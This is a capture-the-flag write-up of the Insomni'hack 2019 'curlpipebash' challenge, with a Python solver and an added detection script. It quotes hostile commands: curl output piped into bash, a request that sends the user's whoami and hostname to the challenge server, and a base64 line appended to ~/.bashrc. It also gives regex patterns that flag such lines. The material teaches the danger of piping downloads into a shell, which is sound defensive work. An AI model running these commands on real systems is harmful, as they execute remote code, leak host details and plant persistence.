Insomni'hack teaser 2019 - Misc - curlpipebash
References
Challenge
Welcome to Insomni'hack teaser 2019!
Execute this Bash command to print the flag 😃
curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
Solution
The curl request is a streaming GET: the server keeps sending data, and each piece is executed locally as it arrives.
root@vultr:~# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash -x
+ bash
+ curl -Ns https://curlpipebash.teaser.insomnihack.ch/03280bf1-7492-4fce-bbcf-617e5a17646a
+ base64 -d
++ whoami
++ hostname
+ curl -Ns https://curlpipebash.teaser.insomnihack.ch/03280bf1-7492-4fce-bbcf-617e5a17646a/add-to-wall-of-shame/root%40vultr.guest
+ echo 'Welcome to the wall of shame!'
Welcome to the wall of shame!
The link https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname) is infuriating just to look at.
To get the flag, it is enough to block or delay the execution of curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname).
import requests

headers = {
    "User-Agent": "curl/7.61.0"  # if it looks like curl and talks like curl...
}


def main():
    url = "https://curlpipebash.teaser.insomnihack.ch/print-flag.sh"
    # stream=True so each line is handled as soon as the server sends it
    r = requests.get(url, headers=headers, stream=True)
    for raw in r.iter_lines():
        l = raw.decode()  # iter_lines() yields bytes on Python 3
        print("print-flag got line: {}".format(l))
        if "curl" in l and "shame" not in l:  # We want to curl all new urls, but not the wall of shame one!
            new_link = l.split(" ")[2]  # who needs regex?..
            print("Requesting new url: {}".format(new_link))
            requests.get(new_link, headers=headers)


if __name__ == "__main__":
    main()
The output is as follows:
# python get-flag.py 
print-flag got line: curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26 | bash
Requesting new url: https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26
print-flag got line: base64  -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK
print-flag got line: curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26/add-to-wall-of-shame/$(whoami)%40$(hostname)
print-flag got line: INS{Miss me with that fishy pipe}
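As an added example (not part of the original write-up), the sketch below audits a script that has been saved to disk instead of piped into bash, using the lines the server streamed in the run above as input. The rule names and regular expressions are this example's own assumptions, not a standard ruleset.

```python
import base64
import re

# Lines copied from the get-flag.py output shown above.
SAMPLE = [
    "curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26 | bash",
    "base64  -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK",
    "curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26/add-to-wall-of-shame/$(whoami)%40$(hostname)",
    "INS{Miss me with that fishy pipe}",
]

# Hypothetical rule set written for this example (names and patterns are assumptions).
RULES = [
    # A second-stage download piped straight into a shell.
    ("remote-code-exec",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b")),
    # A request whose URL embeds the local user or host name.
    ("host-identity-leak",
     re.compile(r"\b(curl|wget)\b.*(\$\((whoami|hostname|id)\)|`(whoami|hostname|id)`)")),
    # A redirect into a shell start-up file (persistence across sessions).
    ("shell-startup-write",
     re.compile(r">>?\s*~?[\w/.$-]*\.(bashrc|bash_profile|profile|zshrc)\b")),
]

# base64 -d fed from a here-string: decode it so the reviewer sees the real payload.
B64_HERESTRING = re.compile(r"base64\s+(-d|--decode)\b.*<<<\s*([A-Za-z0-9+/=]+)")


def audit(lines):
    """Return (line_number, finding) tuples for every rule that matches."""
    findings = []
    for no, line in enumerate(lines, 1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((no, name))
        m = B64_HERESTRING.search(line)
        if m:
            payload = base64.b64decode(m.group(2)).decode("utf-8", "replace").strip()
            findings.append((no, "decoded: " + payload))
    return findings


if __name__ == "__main__":
    for no, finding in audit(SAMPLE):
        print("line {}: {}".format(no, finding))
```

Running it on the sample shows that the .bashrc line installs a PROMPT_COMMAND, which would run on every prompt until it is removed from that file.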